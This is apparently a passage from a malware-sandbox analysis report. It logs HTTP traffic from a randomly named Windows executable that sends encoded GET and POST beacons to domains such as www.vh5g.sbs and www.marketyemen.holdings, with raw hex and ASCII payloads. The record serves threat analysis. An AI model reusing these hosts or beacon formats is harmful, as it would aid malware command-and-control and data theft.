53 39 63 6d 79 59 34 68 54 45 55 6e 6e 79 75 59 65 4b 62 59 67 34 49 43 67 37 35 63 41 42 52 7a 49 38 68 59 45 6d 6e 46 6d 75 49 37 78 73 30 30 4c 4c 57 51 6e 57 32 6c 56 48 6b 73 41 71 50 57 65 69 68 76 6c 4b 6e [TRUNCATED] Data Ascii: V8=hzcABsH4eUH+LzgXUAxiPZrNv256Bwt8iV0gmFa3rKb2v6jXV/hpW9ODH/GliP6LaW3hcp9yS4xhcpezgn0Ynt7nmjqVoszONaZtWlvOdtXC0IheYqZZWZw6rCOsRY00EuBdrPOycvDf6UfVTDmQE9E7mRVb0Pn+JC4+TnOnBqQwFE5z69DRmWpNZ1HpgC7XayhQpVMPGTejzgh6TCAlLbm3/M0RY+8B7sf79i7mOTqpUgdPG8Gc5u0fl/H4aJ61MSQtRFevS9cmyY4hTEUnnyuYeKbYg4ICg75cABRzI8hYEmnFmuI7xs00LLWQnW2lVHksAqPWeihvlKnfkzLy0XxyGAgZPt7cUHGTWY2lSLNvobwyH7v6WyA5KzVEoXQSN//eYzq95E1L0gCF3SRAUqS6d5PJO2uHQZjphH0+4ieon4l6IdfUF+uJviJ4Wrd3A0g9bj4xPZ34zlJNfXM3H3QNbpJUWwWvUyom0buNlEnOgHd7X99cW32s/ibr3go6PN9sMBK9G55guXfN88pE49pNHwD+bG9iu6RgTSIwMFgUaah+b9pBHdFE33/LysFcu8zHfWk1DXRBDEvapunZcz+o4K4gRgtIA2NWiGvnHxhv0s5Iof5owoQjuy/OjwOFFV3GwfgCRPfbG030kXyLQafrnHI3Xl5+r+OI4sOm8MfeyHaf5APl+leKQRIC6vjQbqQibi9QRLQ0LE9l0hbxnphmalmLxl9ozb1tKymdDEHQPVMTbCNv4Bw5lrkTe7uVU+Mrs9U3nQCem/UZ9QXoOX8ha/qjvR+6RCMC+DOlZzk/EmYiqUe4+S5/PTxonwIdUM71Y2mZyYecMMzgDqXLvj+n8uLZaTQnRMtWUsFHan1S3lq3a9PYk3ZX6TwlYEi1s7jIs7sXd6HSpIvCbRgo9OQ/CjLzGIgpZ5iPgRZHOI1GGQdV16GrhHnFAWNALJJT7oGlMQw2rln12EEbYwKNhjZb4FPfu26wVFt8im8Ttcy7/zIgc [TRUNCATED]
Jan 10, 2025 16:43:11.873975992 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:43:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.vh5g.sbs/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CP9m%2BJ3jTxh%2FB9dUeNpI66TMTvLeGYIrvJWotViykKqCeU3%2FLv3F0PHNFDvK98RQjOHACxcWKy6dEYquJq4ecFT2vOO6PSJhzi9I3xqQ2bjl3h2rOMSss%2BzVVErIddQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc8018c15c448-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1469&rtt_var=734&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1852&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body><
Jan 10, 2025 16:43:11.873991966 CET	15	IN	Data Raw: 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: /html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49996	188.114.97.3	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:13.742938995 CET	571	OUT	GET /rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.vh5g.sbs Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:43:14.364311934 CET	1236	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 10 Jan 2025 15:43:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://www.vh5g.sbs/ X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Referrer-Policy: no-referrer-when-downgrade Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self'; Permissions-Policy: interest-cohort=() cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGh75SXJW15AhAkhzEmR6enS8L7%2BFURIFdV3IaI2d5aALr5u5q%2FXD1tJBYxijv%2BjSuiPNH%2FncYMqPCAKExnUwlZp4z6ycCmTYR87FK469gTGNJYjECFsQw3kzQ231aw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc8117f9f5e82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1702&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=571&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></
Jan 10, 2025 16:43:14.364327908 CET	14	IN	Data Raw: 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49997	199.59.243.228	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:27.747950077 CET	851	OUT	POST /8efo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.marketyemen.holdings Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.marketyemen.holdings Referer: http://www.marketyemen.holdings/8efo/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 65 30 6c 6d 72 66 48 74 6c 2f 47 4c 69 4b 50 6f 4f 57 49 64 35 4f 6b 38 52 57 2b 52 77 53 6e 4b 6e 4e 48 6e 65 4a 79 74 70 44 4c 58 38 57 4a 39 2f 6c 36 68 2b 78 6b 52 50 2b 54 2f 33 76 47 68 57 59 30 39 45 46 31 57 71 4c 67 72 52 34 65 56 4b 57 32 55 65 34 2f 66 39 4f 76 58 6e 61 68 42 35 4d 4a 34 2b 77 32 6f 70 78 4a 4f 64 78 69 41 38 67 6c 4f 75 6c 4a 6e 6e 48 46 45 4c 61 6a 39 41 36 57 4d 38 34 76 5a 44 34 75 42 48 37 78 43 6f 75 7a 58 36 4f 71 6a 33 42 6c 65 65 4b 63 61 4b 4f 6f 6b 48 4b 57 53 64 31 35 58 63 65 67 68 45 70 36 53 4c 65 75 55 44 57 41 56 50 59 47 34 44 74 57 50 59 54 41 3d Data Ascii: V8=e0lmrfHtl/GLiKPoOWId5Ok8RW+RwSnKnNHneJytpDLX8WJ9/l6h+xkRP+T/3vGhWY09EF1WqLgrR4eVKW2Ue4/f9OvXnahB5MJ4+w2opxJOdxiA8glOulJnnHFELaj9A6WM84vZD4uBH7xCouzX6Oqj3BleeKcaKOokHKWSd15XceghEp6SLeuUDWAVPYG4DtWPYTA=
Jan 10, 2025 16:43:28.215792894 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:43:27 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: 1fb8d70f-e970-4161-b733-865f50cf3d7f cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA== set-cookie: parking_session=1fb8d70f-e970-4161-b733-865f50cf3d7f; expires=Fri, 10 Jan 2025 15:58:28 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 46 7a 63 6e 46 61 49 73 6d 67 31 30 77 33 59 4d 4c 51 48 64 48 37 41 51 50 72 30 61 4f 39 62 79 79 78 52 59 37 67 53 59 68 63 32 6d 56 67 70 31 61 46 4d 36 4d 37 35 6f 50 4b 34 64 45 38 71 4b 70 6e 74 65 70 65 58 50 68 54 4d 38 4a 47 33 71 4e 76 4f 43 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 16:43:28.215812922 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWZiOGQ3MGYtZTk3MC00MTYxLWI3MzMtODY1ZjUwY2YzZDdmIiwicGFnZV90aW1lIjoxNzM2NTIzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49998	199.59.243.228	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:30.297784090 CET	871	OUT	POST /8efo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.marketyemen.holdings Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.marketyemen.holdings Referer: http://www.marketyemen.holdings/8efo/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 65 30 6c 6d 72 66 48 74 6c 2f 47 4c 6b 70 58 6f 4a 78 38 64 2f 75 6b 37 65 32 2b 52 36 79 6e 30 6e 4e 44 6e 65 49 32 39 70 33 6e 58 38 30 52 39 2b 6e 53 68 75 68 6b 52 48 65 54 36 35 50 47 71 57 59 35 41 45 41 64 57 71 4c 30 72 52 36 57 56 4b 6e 32 58 66 6f 2f 64 6f 65 76 5a 36 71 68 42 35 4d 4a 34 2b 77 79 52 70 78 52 4f 64 67 79 41 39 42 6b 38 77 56 4a 6b 67 48 46 45 59 4b 6a 68 41 36 58 70 38 35 69 32 44 37 47 42 48 37 42 43 6f 37 48 57 77 4f 71 6c 6f 52 6c 49 59 62 30 65 56 50 68 6f 48 63 4c 4c 41 32 4a 4d 64 6f 52 4c 65 4c 79 36 59 2b 43 73 54 46 49 69 65 6f 6e 52 5a 4f 47 2f 47 45 55 37 54 36 42 36 6e 37 2b 51 41 32 66 4a 35 55 34 65 42 57 67 4d Data Ascii: V8=e0lmrfHtl/GLkpXoJx8d/uk7e2+R6yn0nNDneI29p3nX80R9+nShuhkRHeT65PGqWY5AEAdWqL0rR6WVKn2Xfo/doevZ6qhB5MJ4+wyRpxROdgyA9Bk8wVJkgHFEYKjhA6Xp85i2D7GBH7BCo7HWwOqloRlIYb0eVPhoHcLLA2JMdoRLeLy6Y+CsTFIieonRZOG/GEU7T6B6n7+QA2fJ5U4eBWgM
Jan 10, 2025 16:43:30.730664968 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:43:30 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: aa814113-f0d8-47dd-be28-e905a6d0d9cd cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA== set-cookie: parking_session=aa814113-f0d8-47dd-be28-e905a6d0d9cd; expires=Fri, 10 Jan 2025 15:58:30 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 46 7a 63 6e 46 61 49 73 6d 67 31 30 77 33 59 4d 4c 51 48 64 48 37 41 51 50 72 30 61 4f 39 62 79 79 78 52 59 37 67 53 59 68 63 32 6d 56 67 70 31 61 46 4d 36 4d 37 35 6f 50 4b 34 64 45 38 71 4b 70 6e 74 65 70 65 58 50 68 54 4d 38 4a 47 33 71 4e 76 4f 43 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 16:43:30.730680943 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWE4MTQxMTMtZjBkOC00N2RkLWJlMjgtZTkwNWE2ZDBkOWNkIiwicGFnZV90aW1lIjoxNzM2NTIzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49999	199.59.243.228	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:32.844831944 CET	1888	OUT	POST /8efo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.marketyemen.holdings Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.marketyemen.holdings Referer: http://www.marketyemen.holdings/8efo/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 65 30 6c 6d 72 66 48 74 6c 2f 47 4c 6b 70 58 6f 4a 78 38 64 2f 75 6b 37 65 32 2b 52 36 79 6e 30 6e 4e 44 6e 65 49 32 39 70 33 76 58 38 42 4e 39 2f 42 61 68 74 68 6b 52 45 65 54 37 35 50 47 72 57 59 67 48 45 41 52 6f 71 49 4d 72 44 76 61 56 43 31 4f 58 57 6f 2f 64 71 65 76 59 6e 61 68 55 35 4d 5a 38 2b 77 69 52 70 78 52 4f 64 6a 36 41 36 51 6b 38 79 56 4a 6e 6e 48 46 41 4c 61 6a 46 41 36 75 55 38 35 33 4a 44 4b 6d 42 48 62 52 43 75 4a 66 57 32 65 71 6e 70 52 6b 4c 59 62 70 41 56 50 73 5a 48 63 58 68 41 32 78 4d 51 75 30 71 48 50 79 59 4e 63 4b 30 63 31 45 53 4b 66 44 44 63 4d 47 7a 4a 43 51 49 56 6f 56 49 6e 66 43 49 44 30 4f 45 6c 79 77 61 47 44 74 57 55 56 55 57 2b 37 6f 38 7a 57 41 74 32 66 78 46 50 74 77 53 70 78 2f 69 4a 38 76 61 39 66 50 42 64 6a 6b 30 33 37 79 68 64 69 63 4d 2b 69 37 72 54 30 37 52 59 53 7a 7a 54 78 44 43 65 36 2b 39 6b 71 56 32 69 2f 65 6f 43 4f 42 30 66 6c 79 4e 6c 78 63 35 2f 54 55 64 6f 7a 75 5a 76 4c 41 4f 79 33 47 46 77 65 63 30 73 4d 4d 4e 36 7a 49 6b 4b 6e 39 [TRUNCATED] Data Ascii: V8=e0lmrfHtl/GLkpXoJx8d/uk7e2+R6yn0nNDneI29p3vX8BN9/BahthkREeT75PGrWYgHEARoqIMrDvaVC1OXWo/dqevYnahU5MZ8+wiRpxROdj6A6Qk8yVJnnHFALajFA6uU853JDKmBHbRCuJfW2eqnpRkLYbpAVPsZHcXhA2xMQu0qHPyYNcK0c1ESKfDDcMGzJCQIVoVInfCID0OElywaGDtWUVUW+7o8zWAt2fxFPtwSpx/iJ8va9fPBdjk037yhdicM+i7rT07RYSzzTxDCe6+9kqV2i/eoCOB0flyNlxc5/TUdozuZvLAOy3GFwec0sMMN6zIkKn9+TdQF0zysHZTxt/ofhfQ9cbZzCCZiTQ3pk8+esLsQz+4aYC1PktbXEg0Ht2/ap6JAm7bXAUkyM6nM3al5FMdMrCP3GSk4W4l7ZS/ijZ/1/uhDoVCI6pECqfEMRzlmiZP56STcJQuq8oSNrGTdldBGkgqJF0UN89psH8qKOaukCt4x8NH3aK4uLgl+rNwM8QsNerN50MLqLnj1saxsJ+p0zhLXfRHH+pSZhPoXIEWPFjnM8T6QH7Jo15zBHWUdiyiRQ+WJU52SXX/Y6BPKpRbGJn5MZ+/MtQa1IuyzCKGR7havtxZY++7Oo3IyRIPGsdzy6Cul5hTHvxjTKMSJmEfBvEdebcE+cKrXE0QsyF8P3ePnlZKWtIiRZAtbTV9pQykOJiOcFwiK9Lq8CfT6NDIrTZjBd6YjhljwWDUzq76wcog024FRZRPLEwlqqtIpSrCOPOShInHW0evQAZrn3RN1+aZl1r4hqcoAH3Rwiw8Uxg0W76oswawa6BxpaZ5RCn+sNsgXZ2Ar7r5cLJ0768LFnsj5SivIv0K7Yh5FZTl8DgBV+ZFw3pOOD9nSrU5+spHItVF2b1MKoCyl8Vozuy3MzBaJNewBHs9YkdFjIuWL4Lo1u5qGuWUo3jOBErg7UhIo6/Hu4Lvq7BzJqw3uCFhQw7AltrPeAwNUN [TRUNCATED]
Jan 10, 2025 16:43:33.313520908 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 15:43:33 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: c931a5d2-a801-4ac7-95da-9d205984353d cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA== set-cookie: parking_session=c931a5d2-a801-4ac7-95da-9d205984353d; expires=Fri, 10 Jan 2025 15:58:33 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 46 7a 63 6e 46 61 49 73 6d 67 31 30 77 33 59 4d 4c 51 48 64 48 37 41 51 50 72 30 61 4f 39 62 79 79 78 52 59 37 67 53 59 68 63 32 6d 56 67 70 31 61 46 4d 36 4d 37 35 6f 50 4b 34 64 45 38 71 4b 70 6e 74 65 70 65 58 50 68 54 4d 38 4a 47 33 71 4e 76 4f 43 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 16:43:33.313556910 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzkzMWE1ZDItYTgwMS00YWM3LTk1ZGEtOWQyMDU5ODQzNTNkIiwicGFnZV90aW1lIjoxNzM2NTIzOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
